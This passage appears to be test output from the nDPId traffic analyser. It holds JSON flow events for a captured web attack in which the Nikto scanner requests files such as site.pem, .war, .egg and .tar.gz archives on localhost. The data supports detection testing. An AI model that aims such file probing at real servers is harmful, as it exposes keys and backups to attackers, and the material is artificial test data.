(Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00668{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":205,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":205,"pkt_l4_len":171,"thread_ts_msec":1576420277013,"pkt":"AAAAAAAAAAAAAAAACABFAAC\/xzVAAEAGdQF\/AAABfwAAAcNAH5BZGv9XO\/ACDYAYAED+swAAAQEICp1m\/D2dZvw9R0VUIC8xMjcuemlwIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} -01056{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":220,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7440000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420277013,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127.zip","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277014,"pkt":"AAAAAAAAAAAAAAAACABFAADAIeRAAEAGGlJ\/AAABfwAAAcNCH5DPShmIhuR59oAYAED+tAAAAQEICp1m\/D6dZvw+R0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":221,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277016,"pkt":"AAAAAAAAAAAAAAAACABFAADA415AAEAGWNd\/AAABfwAAAcNEH5AFlNs7Kigy04AYAED+tAAAAQEICp1m\/ECdZvxAR0VUIC9zaXRlLnBlbSBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":222,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277016,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/site.pem","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_packet_id":1,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277017,"pkt":"AAAAAAAAAAAAAAAACABFAADConZAAEAGmb1\/AAABfwAAAcNGH5DVgZoTcsiCOoAYAED+tgAAAQEICp1m\/EGdZvxBR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":223,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277017,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_packet_id":1,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277019,"pkt":"AAAAAAAAAAAAAAAACABFAADCTHZAAEAG771\/AAABfwAAAcNIH5DfPnQTJOA0c4AYAED+tgAAAQEICp1m\/EKdZvxCR0VUIC8xMjcwMDEud2FyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":224,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277019,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_packet_id":1,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277020,"pkt":"AAAAAAAAAAAAAAAACABFAADCeAVAAEAGxC5\/AAABfwAAAcNKH5DAxUBlVYOEbYAYAED+tgAAAQEICp1m\/ESdZvxER0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDpzaXRlZmlsZXMpDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":225,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277020,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_packet_id":1,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":208,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":208,"pkt_l4_len":174,"thread_ts_msec":1576420277021,"pkt":"AAAAAAAAAAAAAAAACABFAADC3f5AAEAGXjV\/AAABfwAAAcNMH5AeDOWcmsl5CIAYAED+tgAAAQEICp1m\/EWdZvxFR0VUIC8xMjcwMDEuZWdnIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01059{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":226,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7440000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420277021,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/127001.egg","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00664{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_packet_id":1,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277023,"pkt":"AAAAAAAAAAAAAAAACABFAAC9\/jtAAEAGPf1\/AAABfwAAAcNOH5DeVcZf0\/y26IAYAED+sQAAAQEICp1m\/EedZvxHR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":227,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277023,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_packet_id":1,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1576420277025,"pkt":"AAAAAAAAAAAAAAAACABFAAC9VlRAAEAG5eR\/AAABfwAAAcNQH5CjGG47rGEO3YAYAED+sQAAAQEICp1m\/EmdZvxJR0VUIC8xLndhciBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01054{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":228,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420277025,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/1.war","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_packet_id":1,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277027,"pkt":"AAAAAAAAAAAAAAAACABFAADAghpAAEAGuht\/AAABfwAAAcNSH5AdH7pxZz3Y6IAYAED+tAAAAQEICp1m\/EudZvxLR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6c2l0ZWZpbGVzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":229,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277027,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_packet_id":1,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277028,"pkt":"AAAAAAAAAAAAAAAACABFAADA6xtAAEAGURp\/AAABfwAAAcNUH5DAadNxZUvEiYAYAED+tAAAAQEICp1m\/EydZvxMR0VUIC8wLnRhci5neiBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OnNpdGVmaWxlcykNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01057{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":230,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277028,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/0.tar.gz","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:sitefiles)"}} 